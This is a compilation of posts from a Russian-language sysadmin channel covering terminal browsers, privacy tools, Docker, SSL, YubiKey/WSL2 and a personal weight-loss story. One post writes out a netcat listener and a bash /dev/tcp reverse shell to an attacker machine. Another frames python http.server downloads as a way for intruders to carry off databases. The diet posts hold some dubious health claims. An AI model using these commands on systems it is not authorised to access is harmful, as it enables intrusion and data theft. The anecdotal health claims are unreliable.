Ну началось…
ㅤ
Нашел я тебе тут новейший браузер для терминала. Причем не огрызок ебаный вроде lynx, а прям полноценный, с поддержкой графики, скриптов и со всеми современными технологиями.

Называется это чудо Brow6el, из пакетов ты его не поставишь, потому что разрабатывает его гикнутый профессор, соответственно тебе придется собрать его самому из исходников.

Благо товарищ побеспокоился об ущербных и дал нам Bash скрипты для билда.

Поехали собирать:

git clone https://codeberg.org/janantos/brow6el.git

sudo apt install build-essential cmake gitlibsixel-dev libgtk-3-dev libx11-dev libxrandr-dev libxinerama-dev libxcursor-dev libxi-dev libglib2.0-dev

cd /tmp/brow6el
chmod +x download_cef.sh
./download_cef.sh

mkdir -p build
cd build
cmake ..
make -j$(nproc)

Готово! Теперь запускаем:

cd build
./run_brow6el.sh https://linuxfactory.ru

Как это работает?

В основе лежит Chromium Embedded Framework (CEF), который рендерит страницы без графического интерфейса. Затем Brow6el преобразует полученное изображение в sixel-графику — формат, который поддерживают многие терминалы. В результате браузер выводит картинку в терминал и обновляет её в реальном времени.

Функции:

- поддержка мыши и клавиатуры
- обычный ввод и прокрутка
- вкладки
- менеджер загрузок
- система закладок
- приватный режим
- JavaScript-консоль
- внедрять скрипты по шаблону URL

Фича: ввод мыши возможен как с реальной мыши, так и через виртуальную мышь, управляемую клавиатурой, что позволяет работать даже если у тебя отсутствует мышь.

Короче забавная штука, пользоваться я этим говнищем не буду, но как концепт потыкать вполне себе достойно.

Возможно тебе сгодится для тайлинга или чего-то еще. Забирай в копилку.

🛠 #utilites #linux #terminal
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Tagd Tagd продолжает делиться с нами своими ИТ хаками, тем более после январских праздников у многих кость знатно расширилась. Благо у меня глисты и мне это «наверное» не грозит, но ты почитай, глядишь сгодиться. Поехали!

Часть 1. Рассказ о том, как я похудел со 130 до 85 килограмм.
ㅤ
Видимо я был очень жирным. Пришлось разбить на две части. :-) Это первая часть. Вторая часть здесь.

ИТ - работа с активной умственной работой и отсутствием физической активности. Мозгу нужна глюкоза. Дозировать ее сложно, и поэтому физическое развитие идет в ширину. Оглянитесь - среди айтишников с опытом практически отсутствуют атлеты. Я был такой же. Жирный-мирный. Два раза в год ходил к вертеброневрологу править позвоночник и задыхался при подъеме на третий этаж.

Лицензионное соглашение.

Я никого ни к чему не призываю, ничего не рекомендую, ни за что не отвечаю. Просто рассказываю о себе.

Однажды я встретил знакомого, который постройнел. Он сказал, что просто перестал есть хлеб и сладкое и через месяц у него не стало живота. Это послужило триггером, и я решил попробовать.

Похудение - не диета. Это изменение образа жизни!!! Тут все просто, как в арифметике - есть потребляемые калории, есть расходуемые. Чтобы худеть — нужно меньше жрать калорий.

Я худел в несколько этапов.

1. Отказался от мучных и сладких изделий.
2. Отказался от газированных напитков и соков.
3. Заменил колбасу/сосиски на курятину/индюшатину/рыбу (но не соленую и не консервы).
4. Меняем сливочное масло → сыр → творог. Сметана → кефир.
5. Исключил картофель, добавил в рацион больше каши (гречка, пшеничка, перловка, овсянка). Все без сливочного масла, но с овощами.
6. Уменьшил порции (просто купил маленькую пиалу, и решил, что еда в ней должна быть «без горки».
7. Чай/кофе с одной ложкой сахара можно только 3 раза в день (завтрак/обед/ужин). В остальное время вода. Можно теплая/горячая.
8. Жареное лучше заменить на вареное/тушеное.
9. Увеличил количество овощей и фруктов в рационе. ⭐️

Прядок не важен (кроме последнего) - Применили один пункт - Подождали, Продолжили.

👆 Если Вы что-то убираете из рациона - добавьте овощи или фрукты. И Это НАВСЕГДА!!!

Я худел в несколько этапов. На первом этапе снизил вес со 130 до 105. Потом полка. Привыкал к новому весу.

Затем снизил до 95. И опять полка.

Сначала я худел по 10 кг за месяц. И это было неправильно. Меня шатало, настроение было очень плохим, упали когнитивные способности. Правильный темп похудения - 3-4% текущей массы тела в месяц.

Раз в неделю один завтрак | обед | ужин можно есть - что захочется (я ел мороженное). Но только раз в неделю и только один прием пищи, с соблюдением правила пиялки.

Потом с 95 до 83. Сегодня у меня ~85. Всем Здоровья!

🛠 #рабочиебудни
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Часть 2. Рассказ о том, как я похудел со 130 до 85 килограмм.

Первая часть здесь

🔤🔤🔤🔤🔤🔤🔤

Ну, и теперь просто несколько личных фактов про похудение:

* При очень быстром похудении может быть холодно. Падает температура тела (у меня по утрам была 35). Это не хорошо. Влияет на жизнедеятельность бактерий внутри.
* Если не есть овощи/фрукты и йогурт/кефир могут возникнуть проблемы с пищеварением.
* Некоторые фрукты с "вяжущим" вкусом лучше исключить на время снижения веса. Например незрелые груши, айва, хурма.
* Морковь нужно есть со столовой ложкой растительного масла. (желательно чуть отварить или протушить)
* Если хочется чая/кофе, то на самом деле мозг требует сахара. Попробуйте выпить чай/кофе/воду пару раз без сахара, и желание что-нибудь выпить быстро пропадет.
* Если съесть/выпить сладкое - есть хочется значительно сильнее, чем раньше.
* Если вышел из-за стола с чувством, что наелся - значит переел.
* Оглянитесь, есть ли в вашем окружении "пушеры" (люди которые предлагают/подбивают съесть лишнего или ненужного). Минимизируйте общение с ними.
* Взвешиваться нужно каждое утро. В одно и то же время. Я взвешиваюсь перед завтраком. В это время вес минимальный за сутки :-)
* Некоторые китайские весы запоминают последний вес. И если новый отличается от старого меньше чем +/- 300 гр - показывают предыдущий (типа очень точные. Хреновы маркетологи). Решается взвешиваем другого веса или взвешиванием после ужина (без учета результата).
* Разница в весе между вечером и утром может быть 1 кг (вода и углекислый газ)
* Вес может меняться +/- 1кг в течении месяца в зависимости от фазы луны. И это не приливы.
* При длительном (более 6 месяцев)стабильном весе съесть можно все: торт, пирожки, конфеты, шашлык, но однократно, и с ежедневным контролем веса.
* Если съесть соленое/кислое или арбуз - вес утром может быть +2-3 кг. Но это проходит за два-три дня. Если не проходит - нужно провести ретроспективный анализ и устранить причину.
* При стабильном весе балансировка веса - ужином. На 200гр воды (одна, две (норма) или три столовые ложки с горкой) овсянки c яблоком/бананом на воде.
* Завтрак в 6:30 второй завтрак в 10:40 (только стакан киселя) обед 13:30 ужин в 17:00.
* Снижать вес трудно. Поддерживать - нет.
* Беговая дорожка каждый день в 20:00 (быстрый шаг 5.5-6.5 км/ч 20-30 мин с разминкой и заминкой) уменьшает и калории и чувство голода.
* сон 22:00.
ㅤ
Побочные эффекты:

* Летом - сильная экономия на дезодорантах и порошке для стирки.
* Штаны не протираются между ног. Каблуки в обуви не проваливаются.
* Придется полностью сменить гардероб. Я сменил не только рубашки/брюки но и обувь!!!
* На пятый этаж можно подняться даже не сбив дыхание.
* Походы к вертеброневрологу не нужны.

Всем здоровья.

🛠 #рабочиебудни
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Стабилизация реверс-шелла

Во время создания реверс шелла, управлять этим шеллом прям больно, привычные терминальные команды работают неадекватно. Сейчас покажу, как пентестеры приводят такой шелл к нормальному виду.
ㅤ
Для начала на своей машине запускаем:

nc -lvnp 2288

Этой командой мы откроем порт 2288 на прослушивание, будем ждать входящее соединение. IP этой машины у меня 192.168.10.24.

Теперь на подопытной машине запускаем:

/bin/bash -i >& /dev/tcp/192.168.10.24/2288 0>&1

Возвращаемся на свою машину и видим, что коннект произошел:

root@n8n:~# nc -lvnp 2288
Listening on 0.0.0.0 2288
Connection received on 192.168.10.31 47504
root@onlyoffice:~#

Отлично. Пробуем нажать CTRL+L, для очистки экрана. Ага, хуй там плавал, видим только, что выводятся управляемые символы L^, аналогично не получится нажать CTRL+C и т.п.

Стабилизируем shell

noscript /dev/null -c /bin/bash

Отправляем консоль в бекграунд, нажимаем CTRL+Z

root@onlyoffice:~# ^Z
[1]+  Stopped                 nc -lvnp 2288

Возвращаемся:

stty raw -echo; fg

Нажимаем: ENTER

export TERM=xterm

На этом всё! Теперь наш реверс-шелл полностью стабилен, можем пользоваться им в своё удовольствие, все привычные команды и сочетания работают отлично, артефакты не лезут.

Вроде мелочь, но в своё время кровушки многим попило, да чё юлить, сейчас молодежь которая встала на путь поиска уязвимостей с этим постоянно сталкивается. И что интересно на курсах про «стабилизацию шелла» никогда не рассказывают.

Вот такие пироги, изучай. Больше про реверс-шеллы, можешь почитать тут:

- Практикуем reverse-shells
- Генератор reverse-shells

🛠 #security #linux
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Интимность данных

Как мы знаем, любая операционная система что-то куда-то шлет, шпионит, собирает данные. Потом этими данными начинают жонглировать всякие мастодонты вроде гуглахлама, мягкософта, аппла и т.п.
ㅤ
В лучшем случае тебе покажут таргетированную рекламу, в худшем сольют по первому звоночку всю твою подноготную всяким секрет малдерам и фибиэрам. И узнаешь ты это не сразу, а спустя 2-3 года, а возможно и не узнаешь.

Как говорил мой знакомый — да кому мы нужны, все наши данные давно уже гуляют по сети. Но когда он узнал, что гугол взял его учетку (со всем содержимым и метаданными) и просто отдал третьим лицам на изучение — начинаешь задумываться, причем становится по настоящему жутковато.

Возможно кто-то из вас получал подобные письма (Google received and responded to a legal process issued by the…) и знает это ощущение безысходности. Да, похоже на фейк (2018 года) и фишинг, но увы всё по настоящему. Поищи в сети если интересно, много таких случаев как оказалось.

Ебала рыба озеро! 😲

Лишь только по этим причинам я полностью выпилился из гугла и его сервисов. Про этот большой пиздец-переезд я запилю отдельный пост, было очень познавательно и увлекательно, особенно со смартфоном. Ладно, теперь по теме поста.

Сегодня речь про Privacy Sexy. Кроссплатформенная забияка, с открытым git репозиторием и возможностью установить на машину как отдельное приложение либо использовать через веб.

Этот проект помогает включать/отключать privacy и security настройки в Windows / macOS / Linux с помощью готовых «твиков» и скриптов.

Ты просто выбираешь нужные галочки, а справа получаешь готовые скрипты, которые нужно запустить. Да, под Linux и Mac это будут именно Bash скрипты. Это отличная возможность посмотреть в кишочки и забрать какие-то идеи в свои проекты.

Что внутри:

- Больше 5 сотен скриптов/настроек, которые уменьшают телеметрию, отключают лишние сервисы, усиливают безопасность и приватность.
- Есть графическое приложение (desktop) и веб-версия.
- Всё прозрачно — видно, что именно делает каждый твик/скрипт.
- Обратимость — можно откатить изменения (revert).
- Полный open-source, лицензия AGPL-3.0.

Важно и ценно — в отличие от рандомных «батников» из интернета, privacy.sexy показывает, какие именно изменения будут сделаны и генерирует скрипты прозрачно.

Пользуйся на здоровье, это лучше всяких бинарных твиков!

Ну и не храни на гугол драйве своё хоум-видео с пылесос-отсосом, неровен час сам станешь звездой такого эпизода на которую однажды будут дрочить малдеры с дикого запада.

🛠 #security #privacy
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Многих эта тема обошла стороной, дело привычки берет своё.
ㅤ
Я про docker-compose.yaml. Так вот, в современных дистрибутивах не обязательно называть так файл, достаточно обозвать его compose.yaml и всё будет работать. Но при условии если у тебя не допотопная ОС со старой версией docker’a.

Современный docker давно перешел на compose.yaml.

docker-compose — это отдельный python-инструмент
docker compose — встроенный плагин docker cli

Теперь docker в приоритете ищет файл compose.yaml и только потом старый docker-compose.yaml. И так и так все будет работать. Оно пока на это не ругается, но рано или поздно к этому придут.

Наверное ты уже замечал, что если в yaml указать version: 3.9 оно скажет — ты ебанутый? Я пожалуй это проигнорирую.

Это нужно было указывать раньше, чтобы docker понимал какие поля разрешены и как вообще интерпретировать файл. Теперь это легаси и docker автоматически определяет версию, чтобы избавиться от зоопарка версий: v2, v2, v3.7, v3.9. Получаем один формат → одна логика → меньше гемора.

Кстати аналогичная хуйня в кубере, где версию апихи указываешь в манифестах. Если ты не знаешь как с этим работать, будет тебе боль и страдания. За эту тему поговорим отдельно.

Но опять же если у тебя древняя ОС, выбора особо не будет, придется прописывать версии и поддерживать это наследие.

Пример с version или подстава. Создавалась это не для docker compose, а для docker swarm. В version:3 Docker Compose просто молча игнорировал: mem_limit, cpu_shares, cpus, restart_policy, depends_on. Не было ни ошибок, ни предупреждений. Просто ничего не происходило. Контейнер запускался, но не как ожидалось.

version: "3"
mem_limit: 512m

Хм… 512 говоришь, хуй те! Эй OOM давай к нам, у нас тут пациент!

version:3 — Swarm-спека

Ну и про yaml и yml пару строк. Можно писать так и так, оба варианта равноправны. Но всё же рекомендуется yaml, потому что это полное официальное расширение, так пишется в спецификациях и документациях. Плюсом это единый стиль Kubernetes, GitHub Actions, Helm и т.п.

На сколько помню yml пошел со старых систем, когда было ограничение в 3 символа, опять же наследие прошлого.

Возможно ошибаюсь, поправьте в комментах.

🛠 #docker #linux #devops
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Как тебя вычисляют по шрифтам

Гугловский пробив по кукисам это классика, но это не единственный механизм сопоставления. Сегодня рассмотрим browser fingerprint (fonts).
ㅤ
Пробежимся по кукисам.

Практически на каждом сайте, установлен анальный-зонд с маркировками: Google Analytics, Google Ads, YouTube embed, reCAPTCHA и т.п. То есть страница сайта подгружает внешние скрипты и код с доменов гугла.

Когда ты заходишь на такой сайт, браузер отправляет кукисы в гугол, в них будет информация: твой id (у тебя будет один и тот же для разных сайтов), с какого сайта ты пришел, ip, браузер, время, язык, локация и т.п.

Короче в эту клоаку уходит максимальное количество данных, которое можно от тебя получить. Ну а дальше тебе подсовывают рекламу — ага, этот чёрт читал про «ипотеку», давай заскамим его таргетированными предложениями про ипотеку.

Если ты залогинен в гугле и гуляешь в этом же браузере по другим сайтам — гугл это знает. Мало того, при любом звоночке, он без раздумий передаст эту информацию «малдерам».

Звучит как сказка, но у гугла есть статистика сколько они слили данных по таким запросам. И да, когда ты с закрытыми глазами принимал «лицензионное соглашение», в нём все это оговаривалось.

Что же такое fonts fingerprint?

Это как тест ДНК, который даёт до 99% совпадения. Шрифт это как паспорт. У каждого пользователя свой, уникальный набор шрифтов. Даже если ты отключишь кукисы, у гугла есть другие инструменты для слежки: разрешение экранов, шрифты, webgl, canvas, timezone, ip + поведение.

Кстати «режим инкогнито» не спасёт, это — миф. В этом режиме браузер не сохраняет историю, не сохраняет кукисы после закрытия. ВСЁ! Куки это верхушка айсберга, все остальные методы скрыты под капотом.

Fingerprint это корреляция десятков сигналов во времени.

Как работает классический font fingerprint:

Я подготовил страничку, в ней содержится как раз такой детект по шрифтам и канвасу. Открой её в браузере, а потом открой в «инкогнито» и ты сильно удивишься. Шрифты и хеш канваса будут идентичные.

Даже если открыть страницу в другом браузере, Canvas Hash в большинстве случаев будет идентичен. Для чистоты эксперимента, открой страничку в ТОR браузере и ты увидишь, что набор шрифтов поменялся, да и canvas hash протух.

Идея метода: берем текст, рисуем его с базовым шрифтом (serif / sans-serif), тестируемым шрифтом + fallback, сравниваем размеры, если размеры изменились — шрифт установлен в системе.

И по итогу мы имеем паспорт пользователя: шрифты = ОС + язык + софт. Шрифты меняются редко, уникальность очень высокая, не ломаются при включении VPN / Инкогнито.

fonts + canvas + webgl ≈ уникальность > 99%

А чё делать?

Использовать разные браузеры под разные задачи. Один браузер чисто для гугла (но рекомендую вообще снести учетку и сделать чисто под ютуб), второй для сёрфинга, третий для просмотра порнушки.

На рынке много антидетект браузеров, один из лидеров это LibreWolf. Этот браузер (Firefox на стероидах приватности) подсовывает одинаковый виртуальный набор, ломает измерения, возвращает одинаковые размеры, добавляешь шум.

Отключает webgl fingerprint, режет canvas, нормализует timezone, screen size, locale, отключает webrtc leak, блокирует third-party cookies, выключает телеметрию Mozilla, ломает high-entropy сигналы, всегда врёт одинаково.

LibreWolf не делает «рандом», он делает массовую «одинаковость». То есть условно у 100 пользователей, которые пользуются этим браузером, будут идентичные данные. А среди 100 таких пользователей, тебя сложно идентифицировать — ты одинаковый. Чем больше уникальности, тем легче тебя узнать.

Но ты всё равно спалишься, если залогинишься в гугле, либо будешь использовать этот браузер под разные задачи в рамках одной сессии.

Чтобы скрыться, одного браузера мало, приватность это комплексная мера. По мере моей лени, буду накидывать подобные темы и снимать с тебя розовые очки.

Ну а ты пока переваривай весь этот пиздец. Дальше затрем за Cloudflare и его приколы.

🛠 #security #privacy
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Как быстро скачать файл с сервера
ㅤ
Бывает ситуация, когда тебе нужно быстренько дернуть какой-то файл с сервера, но там нет ни nginx ни т.п. херни. Вспоминать синтаксис scp и ебаться с ключами тоже не хочется. Тем более для такой задачи ставить софт — ну такое себе.

Из ситуации можно выйти проще.

Этот способ в основном используют спец-люди, которые в результате blackbox вектора проникли на север и им нужно утащить жирненькую базу данных. Всё элементарно.

Заходим в любую папку с файлами и запускаем:

python -m http.server 2977

Если питон старый, потрёпанный и сморщенный как хуй, делаем так:

python -m SimpleHTTPServer 2977

Затем курлим файл и скачиваем его к себе на машину:

curl -O http://linuxfactory.ru:2977/bashdays_db.zip

А можем прям в браузере открыть URL и увидеть список всех файлов, кликаем мышкой и скачиваем необходимое.

Еще бывают случаи когда curl не установлен, но wget есть из коробки:

wget -O bashdays_db.zip http://linuxfactory.ru:2977/bashdays_db.zip

Ну и в конце, когда получил желаемое, не забывай остановить такой веб-сервер. Изучай!

🛠 #security #linux #tricks
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Здрасти приехали!

Томить не буду — SelectOS теперь в реестре российского ПО Минцифры.

А это значит, что теперь не нужно оправдываться, что твой прод работает на «не совсем отечественном» ПО.

Ставишь SelectOS, запускаешь проекты и спишь спокойно. А если возникло техническое недопонимание — вендор решит твою проблему. Прям сказка какая-то!

Что в коробке:

- Бесплатный старт → SLA при росте
- 500+ проверенных конфигураций
- Расширенная документация
- Обновления без сюрпризов

Скачать и протестировать самому — лучший аргумент.

🦖 Качни бесплатно и потыкай: https://slc.tl/ugelq

Так же я писал серию постов про эту ОС, было разжевано большинство нюансов. Ознакомиться с полным «старт-паком» можешь по этим ссылкам:

- Пробуем SelectOS
- SelectOS в деле
- Ставим SelectOS в облако

Реклама. ООО "Селектел-Лаб". erid:2W5zFG1ryvQ

Получаем SSL сертификат на IP адрес.
ㅤ
Вот и случилось, теперь ты можешь сгенерить валидный SSL сертификат для айпишника. Не самоподписанный, а прям настоящий от Lets Encrypt.

Не путать с mkcert, это совсем другое.

Единственный момент, такой серт будет валиден несколько дней (160 часов), поэтому придется почаще его выпускать, сейчас ставят 5 дней для обновления, как золотую середину. НЕ рекомендуется ставить 6, иначе можешь словить граблю. Вообще acme сам всё в кроне должен прописать, но это не точно.

Пока это может делать только acme, все остальные (certbot, angie) совсем скоро к этому придут.

Да, для домаших айпишников увы, такая чача не проканает, при попытке получить такой серт, получаем ошибку:

Cannot issue for \"192.168.10.91\": IP address is in a reserved address block: [RFC1918]: Private-Use"

Ну оно и логично, спецификации никто не отменял.

Я буду генерить для 178.72.129.181 на котором у меня установлен nginx. Виртуалка прерываемая, так что денег практически не жрет, для тестов в настоящем облаке — милое дело.

Приступим:

Не забудь подставить своё мыло, а то меня спамом завалит и я буду материться на кота.

curl https://get.acme.sh | sh -s email=shubkin@bashdayz.ru

Конфигурируем default в nginx:

server {
    listen 80 default_server;
    listen [::]:80 default_server;

    server_name _;

    location ~ ^/.well-known/(acme-challenge|pki-validation)/ {
        add_header Content-Type text/plain;
        root /var/www/letsencrypt;
    }

    location / {
        return 301 https://$host$request_uri;
    }
}

Создаем структуру папок и релоадим:

mkdir -p /var/www/letsencrypt
mkdir -p /etc/nginx/ssl
nginx -t
nginx -s reload

Выписываем пиздюлей сертификат:

acme.sh --issue --server letsencrypt -d 178.72.129.181 -w /var/www/letsencrypt --certificate-profile shortlived --days 3

Отлично, сертификат получили, устанавливаем:

acme.sh --install-cert -d 178.72.129.181 --key-file /etc/nginx/ssl/ip.key --fullchain-file /etc/nginx/ssl/ip.crt --ca-file /etc/nginx/ssl/ip.ca.crt --reloadcmd "systemctl restart nginx"

Добавляем дополнительный блок в default в nginx:

server {
    listen 443 ssl default_server;
    listen [::]:443 ssl default_server;
    server_name _;
    return 403;
    ssl_certificate /etc/nginx/ssl/ip.crt;
    ssl_certificate_key /etc/nginx/ssl/ip.key;
}

Перезапускаем:

nginx -t
nginx -s reload

И радуемся, теперь у тебя есть валидный SSL на голом айпишнике:

Общее имя (ЦС)  YE1
Организация  Let's Encrypt
Дата выдачи: 29 января 2026 г.
Срок действия: 5 февраля 2026 г.

Дело в шляпе, что сказать? Пиздато! Порой ОЧЕНЬ не хочется привязывать домен, чтобы обзавестись SSL сертификатом, теперь выход есть. Глядишь найдется хак, чтобы сгенерить подобное для 192.168.0.1, но наверное это из оперы моих влажных фантазий.

🛠 #linux #devops #ssl
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Я тут недавно на новогодние праздники затеял переезд на новый периметровый маршрутизатор. Раньше я использовал pfSense, но с недавнего времени он перестал обновляться. Да и скачать его проблематично. В общем решил переехать на opnSense.

🔤🔤🔤🔤🔤🔤🔤

Сразу скажу, что это уже вторая попытка. Первая попытка провалилась из-за регулярных падений и отваливая интернета.

Доходило до того, что пришлось ставить еженочную перезагрузку. Но, скорее всего это была вина не opnSense, а железа. Машина была старая, память не ECCшная. И вот теперь попытка номер два. На мой взгляд довольно успешная.
ㅤ
Все работает, как часы. На мой взгляд - интерфейс гораздо удобнее, чем у pfSense. Логичнее, что ли. Я не использую его на всю катушку - так, несколько WAN, LAN, DMZ и WI_FI. Все разведено физически, без VLAN.

Единственный затык был с настройкой DHCP. Я так и не понял, зачем туда воткнули три DHCP сервера (Dnsmasq, ISC DHCP, KEA DHCP) Может старшие товарищи объяснят. Немного пободавшись, я решил использовать Dnsmasq.

В общем, переезд прошел удачно. opnSense понравился. На мой взгляд, вполне можно использовать так замену pfSense.

Как установить arpwatch я не нашел, поэтому по традиции написал простенький csh-скрипт для оповещения появления в сети новых связок IP+mac.

Но это в следующий раз. Всем стабильных сетей.

🛠 #networks #linux
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog

Настройка Yubikey + WSL2 + SSH (Часть 1)

TL:DR Настраиваем подключение по ssh к серверам с yubikey, без паролей, физических приватных ключей и смс. Заодно покажу как с помощью хака прокидывать физические USB устройства в WSL машину, авось захочется тебе что-то другое прокинуть и поковырять.

Ставим YubiKey Manager, оно есть под все ОС, я буду ставить на винду и прокидывать ключ в WSL2. Под линукс это все работает из коробки, а вот с виндой + wsl 2— есть проблемы.
ㅤ
Вставляем Yubikey в USB, открываем Manager и проверяем, если всё ок, то ключ появляется. Дополнительно можно проверить в консоли командой: ykman info в ответ получен:

Device type: YubiKey 5 NFC
Serial number: 12345678
Firmware version: 5.7.4
Form factor: Keychain (USB-A)
Enabled USB interfaces: OTP, FIDO, CCID
NFC transport is enabled.

Предварительно в ключ нужно зашить PIN, делается это через тот же Yubikey Manager в разделе Application → FIDO2 → FIDO2 PIN. Забиваем PIN.

PIN можно установить из консоли винды, командой: ykman fido access change-pin. Но если есть морда, то быстрее и приятнее сделать это через морду.

Едем дальше. Прокинуть физический USB в WSL2 не так просто, но есть решение. Называется оно usbipd-win и позволяет прокинуть любую USB железяку внутрь пресловутого WSL2. Скачиваем установщик в разделе Releases и устанавливаем. Рутина.

Дальше еще интереснее. Открываем консоль PowerShell и запускаем:

usbipd list

И видим кучу устройств. Среди всего нужно найти Yubikey, у меня это:

3-2 1050:0407  USB-устройство ввода, Устройство чтения смарт-карт Micros...

Как я это понял? Да банально выткнул ключ из USB, прогнал команду, воткнул и снова прогнал, сравнил что появилось. А появилось именно это устройство, нам нужен его ID, у меня это 1050:0407.

usbipd bind --busid 3-2
usbipd attach --wsl --busid 3-2

Если вылезет ошибка, в большинстве случаев это виндовый фаервол. У меня установлена морда TinyWall, я его на время отключаю. Позже уже добавлю нужные правила.

Нахуя мне фаервол? Хочу держать под контролем софт, который у меня установлен, ну не нравится мне когда что-то утекает без моего ведома, тем более после «гугл приключений».

Так, теперь идем в WSL машину и выполняем sudo lsusb, если всё ок то увидим:

Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 001 Device 002: ID 1050:0407 Yubico.com Yubikey 4/5

Кайф! Что-то прокинулось. Но что? Терпение!

У меня в WSL живет ubuntu 24, доставляем необходимые пакеты:

sudo apt install -y yubikey-manager fido2-tools

Проверяем:

sudo ykman info

Device type: YubiKey 5 NFC
Serial number: 12345678
Firmware version: 5.7.4
Form factor: Keychain (USB-A)
Enabled USB interfaces: OTP, FIDO, CCID
NFC transport is enabled.

sudo fido2-token -L

/dev/hidraw1: vendor=0x1050, product=0x0407 (Yubico YubiKey)

Да сучка! Поздравляю, мы успешно прокинули USB железяку в WSL2. Нюансы! Кудаж без них. Сейчас ключ виден только руту, а нам надо обычному юзеру. Хакаем систему!

В WSL машине создаем файл /etc/udev/rules.d/99-yubikey.rules:

KERNEL=="hidraw*", SUBSYSTEM=="hidraw", ATTRS{idVendor}=="1050", ATTRS{idProduct}=="0407", MODE="0660", GROUP="plugdev", TAG+="uaccess"

Не забываем вставить ID вендора и продукта, мы их выше уже получили и знаем.

Применяем:

sudo usermod -aG plugdev $USER
sudo udevadm control --reload-rules
sudo udevadm trigger

Всё, для чистоты эксперимента можешь открыть новую консоль и убедиться что рядовой юзер теперь в деле.

Теперь можем генерить ключ и подключаться к серверам.

Продолжение будет завтра, всё в один пост не влезло. Завтра рассмотрим генерацию SSH ключей и как пофиксить баги при фрикциях с USB.

🛠 #security #privacy
—
💬 Bashdays 📲 MAX 🌐 LF 🔵 Blog